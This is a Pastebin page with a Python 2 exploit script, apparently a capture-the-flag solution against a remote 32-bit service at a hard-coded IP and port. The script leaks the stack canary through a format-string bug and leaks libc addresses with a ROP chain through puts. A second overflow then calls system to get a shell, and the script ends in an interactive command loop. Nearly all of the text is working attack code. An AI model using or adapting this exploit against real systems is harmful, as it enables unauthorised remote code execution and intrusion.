Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import time
- import struct
- import re
- sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sk.connect(('202.120.7.68',23333))
- def R():
- return sk.recv(40960)
- def S(x):
- sk.send(x)
- def PD(x):
- return struct.pack('I',x)
- def DR():
- s = ''
- while True:
- x = R()
- s += x
- if 'Quit\n' in x:
- return s
- DR()
- S('1\n'+PD(0x0804B009)+'%35$x%10$hn\n')
- magic = PD(int(re.findall('Mr\./Mrs\. ....([0-9a-f]*)\n',DR())[0],16))
- print 'StackGuard:', magic.encode('hex')
- query_text = 0x08048971
- puts_plt = 0x08048520
- read_got = 0x0804AFC4
- read_off = 0x000db4b0
- gets_off = 0x00065560
- system_off = 0x00040100
- pop_ret = 0x08048C3F
- S('2\n' + 'A'*0x100 + magic + PD(0) + PD(0) + PD(0) +
- PD(puts_plt) + PD(query_text) + PD(read_got) +
- '\n')
- time.sleep(0.5)
- read_libc = struct.unpack('I',re.findall('library :\'\(\n(....)',R())[0])[0]
- libc_base = read_libc - read_off
- print 'libc_base:', hex(libc_base)
- gets_libc = gets_off + libc_base
- system_libc = system_off + libc_base
- S('A'*0x100 + magic + PD(0) + PD(0) + PD(0) +
- PD(gets_libc) + PD(system_libc) + PD(0x0804B008) + PD(0x0804B008) +
- '\n')
- time.sleep(0.5)
- print R()
- S('sh\n')
- while True:
- S(raw_input('$ ')+'\n')
- time.sleep(0.5)
- print R()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
